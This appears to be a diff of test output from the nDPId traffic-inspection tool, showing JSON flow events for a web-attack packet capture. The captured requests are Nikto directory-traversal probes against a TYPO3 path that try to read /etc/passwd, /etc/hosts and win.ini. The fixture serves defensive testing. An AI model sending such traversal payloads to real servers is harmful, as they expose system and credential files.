 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01145{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00791{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="}
-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"}
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01146{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
